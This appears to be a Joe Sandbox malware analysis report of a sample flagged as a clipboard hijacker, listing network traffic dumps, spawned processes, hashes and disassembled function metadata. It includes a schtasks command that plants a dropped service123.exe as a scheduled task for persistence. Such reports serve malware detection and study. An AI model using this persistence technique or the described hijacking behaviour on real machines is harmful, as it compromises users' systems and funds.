Oct 20, 2024 15:25:43.128982067 CEST	2472	OUT	Data Raw: a0 68 40 21 e3 95 43 db ff 3b 1e 3a 52 b3 6e 39 cb fb a0 c6 a1 dd 11 98 68 64 50 9f 34 d6 14 53 c3 cd 76 b0 b0 f4 1c 9f f2 e6 74 01 a5 38 22 d0 2e c3 9c b7 07 48 3d 58 c9 65 2a fe 27 1d bd 2f e0 f6 1e 0f e5 a6 df f3 fc 5c 7e 92 21 63 44 a7 7d c5 Data Ascii: h@!C;:Rn9hdP4Svt8".H=Xe*'/\~!cD},p04`2ump6=^uU@s])fUS},;1BfD@h~'B3@aaw$'s#:
Oct 20, 2024 15:25:43.129012108 CEST	2472	OUT	Data Raw: e7 06 0a 6a 7e e1 d5 15 84 27 34 fe 2f 2e 9d 38 b7 8c 8e a8 22 9b d4 d9 88 a2 ff 18 25 67 2c eb bc 86 24 37 7a 29 b8 17 fb aa 85 ef ac f0 a7 d8 15 ad a8 25 4a c2 08 be 60 30 8f db b8 48 b2 a3 68 18 2b 1f b7 08 78 fc 37 4d 4f 7e ce 63 8b 5f ab 31 Data Ascii: j~'4/.8"%g,$7z)%J`0Hh+x7MO~c_16M4eOwW#CZ\|3h"kh5xp+@Z3yR Q8*4`sp!M2@__G^dn:S@PIKqKH=e
Oct 20, 2024 15:25:43.129041910 CEST	2784	OUT	Data Raw: de a6 f6 86 54 e0 9e 0e f3 98 dd 08 fd 02 81 c1 79 8b 45 de 7f ee 83 2c 77 54 85 11 f7 01 8c 30 c5 7b e5 78 1d 7f 21 92 24 4a f0 54 fa d3 82 d4 76 1a 97 a5 35 be 07 a0 12 0e bd 7a d9 14 fa b3 d6 70 12 2c 0b 41 4f 8c 3b 2d a5 d5 ef 39 35 50 88 c8 Data Ascii: TyE,wT0{x!$JTv5zp,AO;-95PchA%eQ7FM_i.!IOe+Aym\|{}AXPg6.$rPIp00SwWnni-1v$C&@%2Bg`;N-l6"k8M</f-!)5]-
Oct 20, 2024 15:25:44.455354929 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Sun, 20 Oct 2024 13:25:44 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Target ID:	0
Start time:	09:25:01
Start date:	20/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xcf0000
File size:	6'664'192 bytes
MD5 hash:	B00D4277CDEB811FDCCC08E336223231
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 00000000.00000003.2493917636.0000000001B68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:26:23
Start date:	20/10/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\service123.exe"
Imagebase:	0xc10000
File size:	314'617'856 bytes
MD5 hash:	F5C1A872DFB371DD7C67A5060BBCAA88
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	09:26:23
Start date:	20/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Imagebase:	0xcd0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:26:23
Start date:	20/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:26:27
Start date:	20/10/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\/service123.exe
Imagebase:	0xc10000
File size:	314'617'856 bytes
MD5 hash:	F5C1A872DFB371DD7C67A5060BBCAA88
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	09:27:02
Start date:	20/10/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\/service123.exe
Imagebase:	0xc10000
File size:	314'617'856 bytes
MD5 hash:	F5C1A872DFB371DD7C67A5060BBCAA88
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	50.4%
Total number of Nodes:	125
Total number of Limit Nodes:	4

Executed Functions

Function 6C2F14B0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 6C2F14CD
_exit.MSVCRT ref: 6C2F151A
_write.MSVCRT ref: 6C2F156A
_close.MSVCRT ref: 6C2F1579

Strings

@, xrefs: 6C3C4AB1
terminated, xrefs: 6C2F1540
,pAl, xrefs: 6C3C4AED
CONOUT$, xrefs: 6C2F14C6

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$,pAl$@$CONOUT$
API String ID: 28676597-3326884968
Opcode ID: 63ef4cd982a0668013add788b7a0144ac399bfe44fef09fb33c754cfa838f703
Instruction ID: 742b645b718a1d55d612b6431479be8baccde092105a848df42743af4ae0c8b8
Opcode Fuzzy Hash: 63ef4cd982a0668013add788b7a0144ac399bfe44fef09fb33c754cfa838f703
Instruction Fuzzy Hash: 34413AB1A083099FDB00EFB9C44566EBBF4AF49318F408A2DE8A5D7640E335D845CF56

Function 00C1116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00C111B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00C11238
__p__acmdln.MSVCRT ref: 00C11261
malloc.MSVCRT ref: 00C112EB
strlen.MSVCRT ref: 00C11323
malloc.MSVCRT ref: 00C1132E
memcpy.MSVCRT ref: 00C11344
GetStartupInfoA.KERNEL32 ref: 00C11433

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: dd613ada71d3fc0c2820334c5cb9de2031a6c1703281abbd2c58b722e164b3e8
Instruction ID: b03adadc31a5eaaa60ecd348a9337fda6ac9174957be9caba0b1e3bf0ebba39b
Opcode Fuzzy Hash: dd613ada71d3fc0c2820334c5cb9de2031a6c1703281abbd2c58b722e164b3e8
Instruction Fuzzy Hash: 22816DB19082158FDB10DF64D8843EDBBF0BB4B344F18852DDE9687211D779D989EB82

Function 00C115B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 00C115CD
_exit.MSVCRT ref: 00C1161A
_write.MSVCRT ref: 00C1166A
_close.MSVCRT ref: 00C11679

Strings

@, xrefs: 00C18341
CONOUT$, xrefs: 00C115C6
terminated, xrefs: 00C11640

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$@$CONOUT$
API String ID: 28676597-491099378
Opcode ID: 1814f5d204a38264fcf4f98de1b80b379a90325335c6ab8837fcc80d13974901
Instruction ID: e355321fcf14af77a7b9562770dfcbea20e5d0721f45490ba5694ce9e2bf9d19
Opcode Fuzzy Hash: 1814f5d204a38264fcf4f98de1b80b379a90325335c6ab8837fcc80d13974901
Instruction Fuzzy Hash: B74139B0908204DFDB00DF79C8447AEBBE4BF8A354F54892DE865D7250E739C989EB52

Function 6C309C22 Relevance: 15.1, APIs: 10, Instructions: 110
sleepclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6C309EB0: GetClipboardSequenceNumber.USER32 ref: 6C309EBE

Sleep.KERNELBASE ref: 6C309BFF
GetClipboardSequenceNumber.USER32 ref: 6C309C08

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: ClipboardNumberSequence$Sleep
String ID:
API String ID: 2948009381-0
Opcode ID: f756716354df22dc47d215b9dd051530f0c25d53f01d7af7457dfdc9587bcd26
Instruction ID: ccb79d3f2577f3e9c77ed5549b1d4ce502879b66bd22871d949829427b76a7af
Opcode Fuzzy Hash: f756716354df22dc47d215b9dd051530f0c25d53f01d7af7457dfdc9587bcd26
Instruction Fuzzy Hash: 6741E6B1A093068EDB00FFB4D1995AEBBF4AF55208F40492CE8D697A44EB35950DCF93

Function 00C181E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 116
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,00C1138E,?,?,00006EA2,00C1138E), ref: 00C18271
GetProcAddress.KERNEL32 ref: 00C1828B
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,00C1138E,?,?,00006EA2,00C1138E), ref: 00C1829D

Strings

Failed to get function address. Error code: %d, xrefs: 00C182E0
EwGFtwKdzPfmOtdbOkTV, xrefs: 00C1827E
ZBldshzBAkDNcchekDNcchezeGR.dll, xrefs: 00C1824A

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: EwGFtwKdzPfmOtdbOkTV$Failed to get function address. Error code: %d$ZBldshzBAkDNcchekDNcchezeGR.dll
API String ID: 145871493-1132103791
Opcode ID: 21121e94e3ef8c053375db00c06e0190fd5790529633d87845cdee4200c05c0c
Instruction ID: 78313a10cf2615790c76913478c659c525169d3c3cf2fd7ac8149ba29ed86089
Opcode Fuzzy Hash: 21121e94e3ef8c053375db00c06e0190fd5790529633d87845cdee4200c05c0c
Instruction Fuzzy Hash: 193181B2909600AFDB00EF74DD456DEBBE4FB4B300F118928E95583211EB75D585EB92

Function 00C18230 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 62
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,00C1138E,?,?,00006EA2,00C1138E), ref: 00C18271
GetProcAddress.KERNEL32 ref: 00C1828B
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,00C1138E,?,?,00006EA2,00C1138E), ref: 00C1829D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00C1138E,?,?,00006EA2,00C1138E), ref: 00C182BD
GetLastError.KERNEL32 ref: 00C182DA
FreeLibrary.KERNEL32 ref: 00C182F3

Strings

EwGFtwKdzPfmOtdbOkTV, xrefs: 00C1827E
Failed to load DLL. Error code: %d, xrefs: 00C182C3
ZBldshzBAkDNcchekDNcchezeGR.dll, xrefs: 00C1824A

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID: Library$ErrorFreeLast$AddressLoadProc
String ID: EwGFtwKdzPfmOtdbOkTV$Failed to load DLL. Error code: %d$ZBldshzBAkDNcchekDNcchezeGR.dll
API String ID: 1397630947-1269340471
Opcode ID: 940d35330c1a50e48de9337ed6334bdca17e38a835c3eeac06baa0d9adfe19cf
Instruction ID: 3d846b79e91621777e70e4ed82909120ede225bd9ed7331e78b3c2df2e1466b4
Opcode Fuzzy Hash: 940d35330c1a50e48de9337ed6334bdca17e38a835c3eeac06baa0d9adfe19cf
Instruction Fuzzy Hash: C6110872809600AFDB01AFB4DD056DE7BA0FB4B300F108628D866C3241FF75D549AB83

Function 00C113C9 Relevance: 12.1, APIs: 8, Instructions: 109
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00C11238
__p__acmdln.MSVCRT ref: 00C11261
malloc.MSVCRT ref: 00C112EB
strlen.MSVCRT ref: 00C11323
malloc.MSVCRT ref: 00C1132E
memcpy.MSVCRT ref: 00C11344
_amsg_exit.MSVCRT ref: 00C113EA
_initterm.MSVCRT ref: 00C1140C

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2053141405-0
Opcode ID: a6de5c54fdff11a153cfe99d50cf1d44d88cd5b03388b26c58602c1d2c9c14d3
Instruction ID: 0b480e245c0ca5c59cb6a4347ed4a3ca8d36ecf5e5598f7b0ec15cd58c6c7fa6
Opcode Fuzzy Hash: a6de5c54fdff11a153cfe99d50cf1d44d88cd5b03388b26c58602c1d2c9c14d3
Instruction Fuzzy Hash: 604109B49083158FDB10EF64D4843DDBBF0BB4B340F15852DDA9697311D778998AEB42

Function 00C111A3 Relevance: 10.6, APIs: 7, Instructions: 115
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00C111B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00C11238
__p__acmdln.MSVCRT ref: 00C11261
malloc.MSVCRT ref: 00C112EB
strlen.MSVCRT ref: 00C11323
malloc.MSVCRT ref: 00C1132E
memcpy.MSVCRT ref: 00C11344
_amsg_exit.MSVCRT ref: 00C113EA
_initterm.MSVCRT ref: 00C1140C

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2230096795-0
Opcode ID: eacee2b131438da04227644c7a6e95c26c72a00030dcd2cdd8b8606b15c7f095
Instruction ID: b7e88f0f2de334fb10b789585d1c2e4c895bd34172e98b40e507d951a4c39265
Opcode Fuzzy Hash: eacee2b131438da04227644c7a6e95c26c72a00030dcd2cdd8b8606b15c7f095
Instruction Fuzzy Hash: 21412CB0A043118FDB10DF64E8843DDBBF0BB4A340F14852DDA9697350D778D985EB91

Function 00C11160 Relevance: 9.1, APIs: 6, Instructions: 131
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00C111B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00C11238
__p__acmdln.MSVCRT ref: 00C11261
malloc.MSVCRT ref: 00C112EB
strlen.MSVCRT ref: 00C11323
malloc.MSVCRT ref: 00C1132E
memcpy.MSVCRT ref: 00C11344
GetStartupInfoA.KERNEL32 ref: 00C11433

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: 809c18a40dc22716330d5cc7ad37e6a220e66a1e6f410f89a10b073c41d80bf5
Instruction ID: f36f671d171a8f8af7447e2a3cbc892868ab7e55d5f321b7181368f8f1675564
Opcode Fuzzy Hash: 809c18a40dc22716330d5cc7ad37e6a220e66a1e6f410f89a10b073c41d80bf5
Instruction Fuzzy Hash: B6513AB1A042118FDB10DF64E8847DEBBF0BB4A340F18852DDE569B321D7789986EB81

Function 6C309B70 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
sleepsynchronizationclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenMutexA.KERNEL32 ref: 6C309B99
CreateMutexA.KERNELBASE ref: 6C309BE3
Sleep.KERNELBASE ref: 6C309BFF
GetClipboardSequenceNumber.USER32 ref: 6C309C08

Strings

goCozsdHEgGOgPuuHxuy, xrefs: 6C309B82, 6C309BCC

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: Mutex$ClipboardCreateNumberOpenSequenceSleep
String ID: goCozsdHEgGOgPuuHxuy
API String ID: 3689039344-41344673
Opcode ID: 36802916a65f971c88ee464f17e09f66e4950f18f5574c735c48a89034136b74
Instruction ID: d9373df4d7d48aa728ca2ccb49813f05f2ad947524e1af0eb597709a9cc15120
Opcode Fuzzy Hash: 36802916a65f971c88ee464f17e09f66e4950f18f5574c735c48a89034136b74
Instruction Fuzzy Hash: A301D2B26083068FDB00EF64C54A76BBFF4AB45344F018818E9C893A40EB75A549CF93

Function 00C11296 Relevance: 5.1, APIs: 4, Instructions: 80
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 00C112EB
strlen.MSVCRT ref: 00C11323
malloc.MSVCRT ref: 00C1132E
memcpy.MSVCRT ref: 00C11344

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 36cdd21ab67ea80571281cb7be62aa2931b58ab55121d2cf2e0aa559fb2fecfd
Instruction ID: 198d8fed7207aa2824edd57715f54c1c7e992c5b543627cc6addfbeb8f716df3
Opcode Fuzzy Hash: 36cdd21ab67ea80571281cb7be62aa2931b58ab55121d2cf2e0aa559fb2fecfd
Instruction Fuzzy Hash: 2331E4B59047158FCB10DF64D8803DDBBF1BB4A300F198529DA9A97311D739AA8AEF81

Function 00C113BB Relevance: 5.1, APIs: 4, Instructions: 66
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 00C112EB
strlen.MSVCRT ref: 00C11323
malloc.MSVCRT ref: 00C1132E
memcpy.MSVCRT ref: 00C11344

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: e61c84730983ca31fe65183c3956737055f3ad0b157c18ba65c22b87b518cf11
Instruction ID: c45b57ad6cbb112103159a8fb69739cabb0f42ae7cda590c70be0a29b7959d1c
Opcode Fuzzy Hash: e61c84730983ca31fe65183c3956737055f3ad0b157c18ba65c22b87b518cf11
Instruction Fuzzy Hash: 9221F2B59053158FCB14DF64D88079DBBF1BB8A300F15892DDA8AA7320D734A946EF81

Function 6C30B3F0 Relevance: 1.4, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 346935ae3a9eafe9dc4a899b41abdbe7147010dafd2128130281adfa30b9fe61
Instruction ID: e461c105e7792182777e9bda4d1869fd07025b9bccba67a40122341be8810ac4
Opcode Fuzzy Hash: 346935ae3a9eafe9dc4a899b41abdbe7147010dafd2128130281adfa30b9fe61
Instruction Fuzzy Hash: 915136B6B452068FCB00DF1DE08051EFBF4FB8531CB544559EA588BB11E735E9448FA2

Function 6C30B560 Relevance: 1.3, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1687b99748d6dd881b83e7be22626c6bce3fee0cacc81ea5238109deb30494dc
Instruction ID: 59b3d971aa77dec0444091f535dd1808c2bdce16d69ddcc032fd0ebbe9d46f18
Opcode Fuzzy Hash: 1687b99748d6dd881b83e7be22626c6bce3fee0cacc81ea5238109deb30494dc
Instruction Fuzzy Hash: 5231C4B27453008FDB149F29D5C164AB7B9BF4630CB9846ACDA108FB55EB35E8058F63

Non-executed Functions

Function 6C2FCD00 Relevance: 33.4, APIs: 22, Instructions: 445stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2FCD7D

Memory Dump Source

